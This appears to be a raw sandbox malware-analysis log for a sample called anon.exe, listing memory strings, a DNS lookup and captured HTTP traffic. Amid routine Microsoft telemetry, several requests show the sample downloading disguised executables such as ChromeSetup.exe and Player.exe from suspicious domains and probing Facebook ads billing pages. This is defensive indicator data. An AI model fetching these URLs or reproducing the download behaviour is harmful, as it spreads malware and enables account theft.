                                Source: anon.exe, 0000001D.00000002.897512609.0000000003D4D000.00000004.00000800.00020000.00000000.sdmp, anon.exe, 0000001D.00000002.857527667.0000000002EF0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                                Source: anon.exe, 0000001D.00000002.900712355.0000000003F0E000.00000004.00000800.00020000.00000000.sdmp, anon.exe, 0000001D.00000002.877123451.0000000003009000.00000004.00000800.00020000.00000000.sdmp, anon.exe, 0000001D.00000002.854779845.0000000002D3F000.00000004.00000800.00020000.00000000.sdmp, anon.exe, 0000001D.00000002.890321975.0000000003BC4000.00000004.00000800.00020000.00000000.sdmp, anon.exe, 0000001D.00000002.896475923.0000000003C88000.00000004.00000800.00020000.00000000.sdmp, anon.exe, 0000001D.00000002.897346785.0000000003D30000.00000004.00000800.00020000.00000000.sdmp, anon.exe, 0000001D.00000002.896292292.0000000003C6B000.00000004.00000800.00020000.00000000.sdmp, anon.exe, 0000001D.00000002.898893908.0000000003DF5000.00000004.00000800.00020000.00000000.sdmp, anon.exe, 0000001D.00000002.899179348.0000000003E12000.00000004.00000800.00020000.00000000.sdmp, anon.exe, 0000001D.00000002.856213759.0000000002E17000.00000004.00000800.00020000.00000000.sdmp, anon.exe, 0000001D.00000002.897512609.0000000003D4D000.00000004.00000800.00020000.00000000.sdmp, anon.exe, 0000001D.00000002.857527667.0000000002EF0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
                                Source: anon.exe, 0000001D.00000002.900712355.0000000003F0E000.00000004.00000800.00020000.00000000.sdmp, anon.exe, 0000001D.00000002.877123451.0000000003009000.00000004.00000800.00020000.00000000.sdmp, anon.exe, 0000001D.00000002.854779845.0000000002D3F000.00000004.00000800.00020000.00000000.sdmp, anon.exe, 0000001D.00000002.890321975.0000000003BC4000.00000004.00000800.00020000.00000000.sdmp, anon.exe, 0000001D.00000002.896475923.0000000003C88000.00000004.00000800.00020000.00000000.sdmp, anon.exe, 0000001D.00000002.897346785.0000000003D30000.00000004.00000800.00020000.00000000.sdmp, anon.exe, 0000001D.00000002.896292292.0000000003C6B000.00000004.00000800.00020000.00000000.sdmp, anon.exe, 0000001D.00000002.898893908.0000000003DF5000.00000004.00000800.00020000.00000000.sdmp, anon.exe, 0000001D.00000002.899179348.0000000003E12000.00000004.00000800.00020000.00000000.sdmp, anon.exe, 0000001D.00000002.856213759.0000000002E17000.00000004.00000800.00020000.00000000.sdmp, anon.exe, 0000001D.00000002.897512609.0000000003D4D000.00000004.00000800.00020000.00000000.sdmp, anon.exe, 0000001D.00000002.857527667.0000000002EF0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas_sfp&command=
                                Source: anon.exe, 0000001D.00000002.890321975.0000000003BC4000.00000004.00000800.00020000.00000000.sdmp, anon.exe, 0000001D.00000002.896475923.0000000003C88000.00000004.00000800.00020000.00000000.sdmp, anon.exe, 0000001D.00000002.899179348.0000000003E12000.00000004.00000800.00020000.00000000.sdmp, anon.exe, 0000001D.00000002.897512609.0000000003D4D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://search.yahoo.com?fr=crmas_sfp
                                Source: anon.exe, 0000001D.00000002.900712355.0000000003F0E000.00000004.00000800.00020000.00000000.sdmp, anon.exe, 0000001D.00000002.877123451.0000000003009000.00000004.00000800.00020000.00000000.sdmp, anon.exe, 0000001D.00000002.854779845.0000000002D3F000.00000004.00000800.00020000.00000000.sdmp, anon.exe, 0000001D.00000002.890321975.0000000003BC4000.00000004.00000800.00020000.00000000.sdmp, anon.exe, 0000001D.00000002.896475923.0000000003C88000.00000004.00000800.00020000.00000000.sdmp, anon.exe, 0000001D.00000002.897346785.0000000003D30000.00000004.00000800.00020000.00000000.sdmp, anon.exe, 0000001D.00000002.896292292.0000000003C6B000.00000004.00000800.00020000.00000000.sdmp, anon.exe, 0000001D.00000002.898893908.0000000003DF5000.00000004.00000800.00020000.00000000.sdmp, anon.exe, 0000001D.00000002.899179348.0000000003E12000.00000004.00000800.00020000.00000000.sdmp, anon.exe, 0000001D.00000002.856213759.0000000002E17000.00000004.00000800.00020000.00000000.sdmp, anon.exe, 0000001D.00000002.897512609.0000000003D4D000.00000004.00000800.00020000.00000000.sdmp, anon.exe, 0000001D.00000002.857527667.0000000002EF0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://search.yahoo.com?fr=crmas_sfpf
                                Source: anon.exe, 0000001D.00000002.900712355.0000000003F0E000.00000004.00000800.00020000.00000000.sdmp, anon.exe, 0000001D.00000002.877123451.0000000003009000.00000004.00000800.00020000.00000000.sdmp, anon.exe, 0000001D.00000002.854779845.0000000002D3F000.00000004.00000800.00020000.00000000.sdmp, anon.exe, 0000001D.00000002.890321975.0000000003BC4000.00000004.00000800.00020000.00000000.sdmp, anon.exe, 0000001D.00000002.896475923.0000000003C88000.00000004.00000800.00020000.00000000.sdmp, anon.exe, 0000001D.00000002.897346785.0000000003D30000.00000004.00000800.00020000.00000000.sdmp, anon.exe, 0000001D.00000002.896292292.0000000003C6B000.00000004.00000800.00020000.00000000.sdmp, anon.exe, 0000001D.00000002.898893908.0000000003DF5000.00000004.00000800.00020000.00000000.sdmp, anon.exe, 0000001D.00000002.899179348.0000000003E12000.00000004.00000800.00020000.00000000.sdmp, anon.exe, 0000001D.00000002.856213759.0000000002E17000.00000004.00000800.00020000.00000000.sdmp, anon.exe, 0000001D.00000002.897512609.0000000003D4D000.00000004.00000800.00020000.00000000.sdmp, anon.exe, 0000001D.00000002.857527667.0000000002EF0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                                Source: unknownDNS traffic detected: queries for: potunulit.org
                                Source: C:\Users\user\AppData\Local\Temp\6267.exeCode function: 13_2_001C85E6 InternetOpenW,InternetConnectA,HttpOpenRequestA,HttpSendRequestA,InternetReadFile,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,Sleep,Sleep,13_2_001C85E6
                                Source: global trafficHTTP traffic detected: GET /cms/api/am/imageFileData/RE55ZJm?ver=d909 HTTP/1.1Accept: */*Accept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 Edge/17.17134Host: img-prod-cms-rt-microsoft-com.akamaized.netConnection: Keep-Alive
                                Source: global trafficHTTP traffic detected: GET /cms/api/am/imageFileData/RE55wxd?ver=c28e HTTP/1.1Accept: */*Accept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 Edge/17.17134Host: img-prod-cms-rt-microsoft-com.akamaized.netConnection: Keep-Alive
                                Source: global trafficHTTP traffic detected: GET /cms/api/am/imageFileData/RE5cm11?ver=958c HTTP/1.1Accept: */*Accept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 Edge/17.17134Host: img-prod-cms-rt-microsoft-com.akamaized.netConnection: Keep-Alive
                                Source: global trafficHTTP traffic detected: GET /v1/a/installComplete?pg=PC000P0FR5.0000000IQ8&unid=314559&placementType=PostOOBE&app=&pid=425681885&cid=128000000003678769&tid=700342085&reqasid=0e5fea829d184a55badf9714f679f032&region=US&lang=EN-US&oem=&devFam=WINDOWS.DESKTOP&ossku=PROFESSIONAL&cmdVer=10.0.17134.1&mo=&cap=&auid=&anid=&muid=&persid=&itemId=9WZDNCRFHVN5&skuId=0010&installKind=RedirectTile&ctid=store-curated-postoobe&bSrc=i.t&asid=e1fa4ce255404d92bcfa543339479a52&time=20230105T075735Z HTTP/1.1Accept-Encoding: gzip, deflateUser-Agent: WindowsShellClient/9.0.40929.0 (Windows)Host: eudb.ris.api.iris.microsoft.comConnection: Keep-Alive
                                Source: global trafficHTTP traffic detected: GET /v1/a/opportunity?pg=PC000P0FR5.0000000IQ8&unid=314559&placementType=PostOOBE&app=&pid=425681885&cid=128000000003678769&tid=700342085&reqasid=0e5fea829d184a55badf9714f679f032&region=US&lang=EN-US&oem=&devFam=WINDOWS.DESKTOP&ossku=PROFESSIONAL&cmdVer=10.0.17134.1&mo=&cap=&auid=&anid=&muid=&persid=&itemId=9P1J8S7CCWWT&skuId=0010&installKind=RedirectTile&ctid=store-curated-postoobe&bSrc=i.t&asid=e1fa4ce255404d92bcfa543339479a52&time=20230105T075736Z HTTP/1.1Accept-Encoding: gzip, deflateUser-Agent: WindowsShellClient/9.0.40929.0 (Windows)Host: eudb.ris.api.iris.microsoft.comConnection: Keep-Alive
                                Source: global trafficHTTP traffic detected: GET /v1/a/opportunity?pg=PC000P0FR5.0000000IQ8&unid=314559&placementType=PostOOBE&app=&pid=425681885&cid=128000000003678769&tid=700342085&reqasid=0e5fea829d184a55badf9714f679f032&region=US&lang=EN-US&oem=&devFam=WINDOWS.DESKTOP&ossku=PROFESSIONAL&cmdVer=10.0.17134.1&mo=&cap=&auid=&anid=&muid=&persid=&itemId=9P6RC76MSMMJ&skuId=0010&installKind=RedirectTile&ctid=store-curated-postoobe&bSrc=i.t&asid=e1fa4ce255404d92bcfa543339479a52&time=20230105T075736Z HTTP/1.1Accept-Encoding: gzip, deflateUser-Agent: WindowsShellClient/9.0.40929.0 (Windows)Host: eudb.ris.api.iris.microsoft.comConnection: Keep-Alive
                                Source: global trafficHTTP traffic detected: GET /v1/a/opportunity?pg=PC000P0FR5.0000000IQ8&unid=314559&placementType=PostOOBE&app=&pid=425681885&cid=128000000003678769&tid=700342085&reqasid=0e5fea829d184a55badf9714f679f032&region=US&lang=EN-US&oem=&devFam=WINDOWS.DESKTOP&ossku=PROFESSIONAL&cmdVer=10.0.17134.1&mo=&cap=&auid=&anid=&muid=&persid=&itemId=9NH2GPH4JZS4&skuId=0010&installKind=RedirectTile&ctid=store-curated-postoobe&bSrc=i.t&asid=e1fa4ce255404d92bcfa543339479a52&time=20230105T075737Z HTTP/1.1Accept-Encoding: gzip, deflateUser-Agent: WindowsShellClient/9.0.40929.0 (Windows)Host: eudb.ris.api.iris.microsoft.comConnection: Keep-Alive
                                Source: global trafficHTTP traffic detected: GET /v1/a/opportunity?pg=PC000P0FR5.0000000IQ8&unid=314559&placementType=PostOOBE&app=&pid=425681885&cid=128000000003678769&tid=700342085&reqasid=0e5fea829d184a55badf9714f679f032&region=US&lang=EN-US&oem=&devFam=WINDOWS.DESKTOP&ossku=PROFESSIONAL&cmdVer=10.0.17134.1&mo=&cap=&auid=&anid=&muid=&persid=&itemId=9NBLGGH5L9XT&skuId=0010&installKind=RedirectTile&ctid=store-curated-postoobe&bSrc=i.t&asid=e1fa4ce255404d92bcfa543339479a52&time=20230105T075737Z HTTP/1.1Accept-Encoding: gzip, deflateUser-Agent: WindowsShellClient/9.0.40929.0 (Windows)Host: eudb.ris.api.iris.microsoft.comConnection: Keep-Alive
                                Source: global trafficHTTP traffic detected: GET /v1/a/opportunity?pg=PC000P0FR5.0000000IQ8&unid=314559&placementType=PostOOBE&app=&pid=425681885&cid=128000000003678769&tid=700342085&reqasid=0e5fea829d184a55badf9714f679f032&region=US&lang=EN-US&oem=&devFam=WINDOWS.DESKTOP&ossku=PROFESSIONAL&cmdVer=10.0.17134.1&mo=&cap=&auid=&anid=&muid=&persid=&itemId=9WZDNCRF0083&skuId=0010&installKind=RedirectTile&ctid=store-curated-postoobe&bSrc=i.t&asid=e1fa4ce255404d92bcfa543339479a52&time=20230105T075738Z HTTP/1.1Accept-Encoding: gzip, deflateUser-Agent: WindowsShellClient/9.0.40929.0 (Windows)Host: eudb.ris.api.iris.microsoft.comConnection: Keep-Alive
                                Source: global trafficHTTP traffic detected: GET /v1/a/impression?CID=128000000003678769&region=US&lang=EN-US&oem=&devFam=WINDOWS.DESKTOP&ossku=PROFESSIONAL&cmdVer=10.0.17134.1&mo=&cap=&EID=&&PID=425681885&UIT=M-&TargetID=700342085&AN=504366868&PG=PC000P0FR5.0000000IQ8&REQASID=71556A9323DB45B28A3108EE5D06049B&UNID=314559&ID=00000000000000000000000000000001&ASID=e1fa4ce255404d92bcfa543339479a52&REQT=20230105T075648&TIME=20230105T075738Z&RV=&RS=&DEVOSVER=10.0.17134.1&LOCALID=w:D9BC7EDF-91E8-C8ED-3ED4-3B144B30C00C&DS_EVTID=0e5fea829d184a55badf9714f679f032&WFIDS=&ER_AC=&ARCRAS=&CLR=CDM HTTP/1.1Accept-Encoding: gzip, deflateUser-Agent: WindowsShellClient/9.0.40929.0 (Windows)Host: ris.api.iris.microsoft.comConnection: Keep-Alive
                                Source: global trafficHTTP traffic detected: GET /v1/a/installComplete?pg=PC000P0FR5.0000000IQ8&unid=314559&placementType=PostOOBE&app=&pid=425681888&cid=128000000003871249&tid=700342084&reqasid=34309a4234a64eed9bf34cb1d61fabc7&region=US&lang=EN-US&oem=&devFam=WINDOWS.DESKTOP&ossku=PROFESSIONAL&cmdVer=10.0.17134.1&mo=&cap=&auid=&anid=&muid=&persid=&itemId=9WZDNCRFJ3P2&skuId=0010&installKind=RedirectTile&ctid=store-curated-postoobe&bSrc=i.t&asid=46e973b2872c43498ef85ee06e49e152&time=20230105T075739Z HTTP/1.1Accept-Encoding: gzip, deflateUser-Agent: WindowsShellClient/9.0.40929.0 (Windows)Host: eudb.ris.api.iris.microsoft.comConnection: Keep-Alive
                                Source: global trafficHTTP traffic detected: GET /v1/a/installComplete?pg=PC000P0FR5.0000000IQ8&unid=314559&placementType=PostOOBE&app=&pid=425681888&cid=128000000003871249&tid=700342084&reqasid=34309a4234a64eed9bf34cb1d61fabc7&region=US&lang=EN-US&oem=&devFam=WINDOWS.DESKTOP&ossku=PROFESSIONAL&cmdVer=10.0.17134.1&mo=&cap=&auid=&anid=&muid=&persid=&itemId=9WZDNCRFHWD2&skuId=0010&installKind=RedirectTile&ctid=store-curated-postoobe&bSrc=i.t&asid=46e973b2872c43498ef85ee06e49e152&time=20230105T075739Z HTTP/1.1Accept-Encoding: gzip, deflateUser-Agent: WindowsShellClient/9.0.40929.0 (Windows)Host: eudb.ris.api.iris.microsoft.comConnection: Keep-Alive
                                Source: global trafficHTTP traffic detected: GET /v1/a/opportunity?pg=PC000P0FR5.0000000IQ8&unid=314559&placementType=PostOOBE&app=&pid=425681888&cid=128000000003871249&tid=700342084&reqasid=34309a4234a64eed9bf34cb1d61fabc7&region=US&lang=EN-US&oem=&devFam=WINDOWS.DESKTOP&ossku=PROFESSIONAL&cmdVer=10.0.17134.1&mo=&cap=&auid=&anid=&muid=&persid=&itemId=9NBLGGH5R558&skuId=0010&installKind=RedirectTile&ctid=store-curated-postoobe&bSrc=i.t&asid=46e973b2872c43498ef85ee06e49e152&time=20230105T075740Z HTTP/1.1Accept-Encoding: gzip, deflateUser-Agent: WindowsShellClient/9.0.40929.0 (Windows)Host: eudb.ris.api.iris.microsoft.comConnection: Keep-Alive
                                Source: global trafficHTTP traffic detected: GET /v1/a/opportunity?pg=PC000P0FR5.0000000IQ8&unid=314559&placementType=PostOOBE&app=&pid=425681888&cid=128000000003871249&tid=700342084&reqasid=34309a4234a64eed9bf34cb1d61fabc7&region=US&lang=EN-US&oem=&devFam=WINDOWS.DESKTOP&ossku=PROFESSIONAL&cmdVer=10.0.17134.1&mo=&cap=&auid=&anid=&muid=&persid=&itemId=9NCBCSZSJRSB&skuId=0010&installKind=RedirectTile&ctid=store-curated-postoobe&bSrc=i.t&asid=46e973b2872c43498ef85ee06e49e152&time=20230105T075741Z HTTP/1.1Accept-Encoding: gzip, deflateUser-Agent: WindowsShellClient/9.0.40929.0 (Windows)Host: eudb.ris.api.iris.microsoft.comConnection: Keep-Alive
                                Source: global trafficHTTP traffic detected: GET /v1/a/opportunity?pg=PC000P0FR5.0000000IQ8&unid=314559&placementType=PostOOBE&app=&pid=425681888&cid=128000000003871249&tid=700342084&reqasid=34309a4234a64eed9bf34cb1d61fabc7&region=US&lang=EN-US&oem=&devFam=WINDOWS.DESKTOP&ossku=PROFESSIONAL&cmdVer=10.0.17134.1&mo=&cap=&auid=&anid=&muid=&persid=&itemId=9NXQXXLFST89&skuId=0010&installKind=RedirectTile&ctid=store-curated-postoobe&bSrc=i.t&asid=46e973b2872c43498ef85ee06e49e152&time=20230105T075741Z HTTP/1.1Accept-Encoding: gzip, deflateUser-Agent: WindowsShellClient/9.0.40929.0 (Windows)Host: eudb.ris.api.iris.microsoft.comConnection: Keep-Alive
                                Source: global trafficHTTP traffic detected: GET /v1/a/opportunity?pg=PC000P0FR5.0000000IQ8&unid=314559&placementType=PostOOBE&app=&pid=425681888&cid=128000000003871249&tid=700342084&reqasid=34309a4234a64eed9bf34cb1d61fabc7&region=US&lang=EN-US&oem=&devFam=WINDOWS.DESKTOP&ossku=PROFESSIONAL&cmdVer=10.0.17134.1&mo=&cap=&auid=&anid=&muid=&persid=&itemId=9WZDNCRFHWD2&skuId=0010&installKind=RedirectTile&ctid=store-curated-postoobe&bSrc=i.t&asid=46e973b2872c43498ef85ee06e49e152&time=20230105T075741Z HTTP/1.1Accept-Encoding: gzip, deflateUser-Agent: WindowsShellClient/9.0.40929.0 (Windows)Host: eudb.ris.api.iris.microsoft.comConnection: Keep-Alive
                                Source: global trafficHTTP traffic detected: GET /v1/a/impression?CID=128000000003871249&region=US&lang=EN-US&oem=&devFam=WINDOWS.DESKTOP&ossku=PROFESSIONAL&cmdVer=10.0.17134.1&mo=&cap=&EID=&&PID=425681888&UIT=M-&TargetID=700342084&AN=749058556&PG=PC000P0FR5.0000000IQ8&REQASID=71556A9323DB45B28A3108EE5D06049B&UNID=314559&ID=00000000000000000000000000000001&ASID=46e973b2872c43498ef85ee06e49e152&REQT=20230105T075648&TIME=20230105T075742Z&RV=&RS=&DEVOSVER=10.0.17134.1&LOCALID=w:D9BC7EDF-91E8-C8ED-3ED4-3B144B30C00C&DS_EVTID=34309a4234a64eed9bf34cb1d61fabc7&WFIDS=&ER_AC=&ARCRAS=&CLR=CDM HTTP/1.1Accept-Encoding: gzip, deflateUser-Agent: WindowsShellClient/9.0.40929.0 (Windows)Host: ris.api.iris.microsoft.comConnection: Keep-Alive
                                Source: global trafficHTTP traffic detected: GET /cms/api/am/imageFileData/RE55B7D?ver=b25f HTTP/1.1Accept: */*Accept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 Edge/17.17134Host: img-prod-cms-rt-microsoft-com.akamaized.netConnection: Keep-Alive
                                Source: global trafficHTTP traffic detected: GET /cms/api/am/imageFileData/RE55T0T?ver=6359 HTTP/1.1Accept: */*Accept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 Edge/17.17134Host: img-prod-cms-rt-microsoft-com.akamaized.netConnection: Keep-Alive
                                Source: global trafficHTTP traffic detected: GET /cms/api/am/imageFileData/RE57dh2?ver=2fad HTTP/1.1Accept: */*Accept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 Edge/17.17134Host: img-prod-cms-rt-microsoft-com.akamaized.netConnection: Keep-Alive
                                Source: global trafficHTTP traffic detected: GET /cms/api/am/imageFileData/RE57vGT?ver=0a71 HTTP/1.1Accept: */*Accept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 Edge/17.17134Host: img-prod-cms-rt-microsoft-com.akamaized.netConnection: Keep-Alive
                                Source: global trafficHTTP traffic detected: GET /cms/api/am/imageFileData/RE4RDSw?ver=2d41 HTTP/1.1Accept: */*Accept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 Edge/17.17134Host: img-prod-cms-rt-microsoft-com.akamaized.netConnection: Keep-Alive
                                Source: global trafficHTTP traffic detected: GET /cms/api/am/imageFileData/RE4RyG4?ver=257c HTTP/1.1Accept: */*Accept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 Edge/17.17134Host: img-prod-cms-rt-microsoft-com.akamaized.netConnection: Keep-Alive
                                Source: global trafficHTTP traffic detected: GET /systems/ChromeSetup.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: polyzi.com
                                Source: global trafficHTTP traffic detected: GET /Player.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: lazydowns.com
                                Source: global trafficHTTP traffic detected: GET /llpb1135a.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: lazydowns.com
                                Source: global trafficHTTP traffic detected: GET /service/update2/crx?os=win&arch=x64&os_arch=x86_64&nacl_arch=x86-64&prod=chromecrx&prodchannel=&prodversion=104.0.5112.81&lang=en-GB&acceptformat=crx3&x=id%3Dnmmhkkegccagdldgiimedpiccmgmieda%26v%3D0.0.0.0%26installedby%3Dother%26uc%26ping%3Dr%253D-1%2526e%253D1 HTTP/1.1Host: clients2.google.comConnection: keep-aliveX-Goog-Update-Interactivity: fgX-Goog-Update-AppId: nmmhkkegccagdldgiimedpiccmgmiedaX-Goog-Update-Updater: chromecrx-104.0.5112.81Sec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en-US;q=0.9,en;q=0.8
                                Source: global trafficHTTP traffic detected: GET /mscc/lib/v2/wcp-consent.js HTTP/1.1Host: wcpstatic.microsoft.comConnection: keep-alivesec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://learn.microsoft.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en-US;q=0.9,en;q=0.8
                                Source: global trafficHTTP traffic detected: GET /scripts/c/ms.jsll-3.min.js HTTP/1.1Host: js.monitor.azure.comConnection: keep-alivesec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://learn.microsoft.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en-US;q=0.9,en;q=0.8
                                Source: global trafficHTTP traffic detected: GET /v7.0/products/lookup?alternateId=PackageFamilyName&value=AmazonVideo.PrimeVideo_pwbj9vvecjh7j&market=US&languages=en-US%2Cen%2Cneutral&fieldsTemplate=InstallAgent&moId=Public&oemId=Public&scmId=Public HTTP/1.1Connection: Keep-AliveContent-Type: application/jsonUser-Agent: Install ServiceMS-CV: boTyXZJqYkehc3fy.0.2.4Host: displaycatalog.mp.microsoft.com
                                Source: global trafficHTTP traffic detected: GET /v7.0/products/lookup?alternateId=PackageFamilyName&value=Disney.37853FC22B2CE_6rarf9sa4v8jt&market=US&languages=en-US%2Cen%2Cneutral&fieldsTemplate=InstallAgent&moId=Public&oemId=Public&scmId=Public HTTP/1.1Connection: Keep-AliveContent-Type: application/jsonUser-Agent: Install ServiceMS-CV: gh25C67HW06WdAJn.0.2.4Host: displaycatalog.mp.microsoft.com
                                Source: global trafficHTTP traffic detected: GET /v7.0/products/lookup?alternateId=PackageFamilyName&value=BytedancePte.Ltd.TikTok_6yccndn6064se&market=US&languages=en-US%2Cen%2Cneutral&fieldsTemplate=InstallAgent&moId=Public&oemId=Public&scmId=Public HTTP/1.1Connection: Keep-AliveContent-Type: application/jsonUser-Agent: Install ServiceMS-CV: qws4fbTIWU+WpwRN.0.2.4Host: displaycatalog.mp.microsoft.com
                                Source: global trafficHTTP traffic detected: GET /v7.0/products/lookup?alternateId=PackageFamilyName&value=Facebook.InstagramBeta_8xx8rvfyw5nnt&market=US&languages=en-US%2Cen%2Cneutral&fieldsTemplate=InstallAgent&moId=Public&oemId=Public&scmId=Public HTTP/1.1Connection: Keep-AliveContent-Type: application/jsonUser-Agent: Install ServiceMS-CV: GVINRJ5SwUqgi3dw.0.2.4Host: displaycatalog.mp.microsoft.com
                                Source: global trafficHTTP traffic detected: GET /ads/manager/account_settings/account_billing HTTP/1.1Connection: Keep-AliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: en,q=0.9;q=0.8,ja;q=0.7,af;q=0.6,am;q=0.5,sq;q=0.4,ar;q=0.3,an;q=0.2,hy;q=0.1,ast;q=0.1,az;q=0.1,bn;q=0.1,eu;q=0.1Host: www.facebook.comUser-Agent: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36 Edg/108.0.1462.42sec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108", "Microsoft Edge";v="108"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"sec-ch-prefers-color-scheme: lightUpgrade-Insecure-Requests: 1Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: document
                                Source: global trafficHTTP traffic detected: GET /login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing HTTP/1.1Connection: Keep-AliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: en,q=0.9;q=0.8,ja;q=0.7,af;q=0.6,am;q=0.5,sq;q=0.4,ar;q=0.3,an;q=0.2,hy;q=0.1,ast;q=0.1,az;q=0.1,bn;q=0.1,eu;q=0.1Host: www.facebook.comUser-Agent: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36 Edg/108.0.1462.42sec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108", "Microsoft Edge";v="108"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"sec-ch-prefers-color-scheme: lightUpgrade-Insecure-Requests: 1Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: document
                                Source: global trafficHTTP traffic detected: GET /v7.0/products/lookup?alternateId=PackageFamilyName&value=Clipchamp.Clipchamp_yxz26nhyzhsrt&market=US&languages=en-US%2Cen%2Cneutral&fieldsTemplate=InstallAgent&moId=Public&oemId=Public&scmId=Public HTTP/1.1Connection: Keep-AliveContent-Type: application/jsonUser-Agent: Install ServiceMS-CV: 4oJ6+hRbqUyy8kuL.0.2.4Host: displaycatalog.mp.microsoft.com
                                Source: global trafficHTTP traffic detected: GET /v7.0/products/lookup?alternateId=PackageFamilyName&value=Facebook.317180B0BB486_8xx8rvfyw5nnt&market=US&languages=en-US%2Cen%2Cneutral&fieldsTemplate=InstallAgent&moId=Public&oemId=Public&scmId=Public HTTP/1.1Connection: Keep-AliveContent-Type: application/jsonUser-Agent: Install ServiceMS-CV: 5zVhwLb0Wkqwx3bh.0.2.4Host: displaycatalog.mp.microsoft.com
                                Source: global trafficHTTP traffic detected: GET /v7.0/products/lookup?alternateId=PackageFamilyName&value=Microsoft.Todos_8wekyb3d8bbwe&market=US&languages=en-US%2Cen%2Cneutral&fieldsTemplate=InstallAgent&moId=Public&oemId=Public&scmId=Public HTTP/1.1Connection: Keep-AliveContent-Type: application/jsonUser-Agent: Install ServiceMS-CV: bnO7ppOXOE6m9K13.0.2.4Host: displaycatalog.mp.microsoft.com
                                Source: global trafficHTTP traffic detected: GET /systems/index.php HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: degroeneuitzender.nl
